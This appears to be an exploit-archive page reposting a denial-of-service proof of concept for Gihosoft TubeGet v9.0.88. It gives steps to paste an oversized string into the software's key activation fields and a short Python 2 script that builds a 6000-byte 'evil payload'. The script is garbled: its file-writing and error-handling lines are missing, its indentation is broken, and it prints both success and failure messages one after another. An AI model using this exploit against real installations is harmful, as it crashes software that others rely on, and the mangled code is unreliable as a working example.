Edit Report

Our sensors found this exploit at:

Below is a copy:

Gihosoft TubeGet v9.0.88 Denial of Service Exploit
# Exploit Title: Gihosoft TubeGet v9.0.88 Denial of Service Exploit
# Date: 07.03.2023
# Vendor Homepage:
# Software Link:
# Exploit Author: Achilles
# Tested Version: v9.0.88
# Tested on: Windows 7 x64

# 1.- Run python code
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Gihosoft_TubeGet and Click 'I already have the key'
# 4.- Paste the content of EVIL.txt into the Fields
# 5.- Click 'Activate' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
        print "[+] Creating %s bytes evil payload.." %len(buffer)
        print "[+] File created!"
        print "File cannot be created"

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.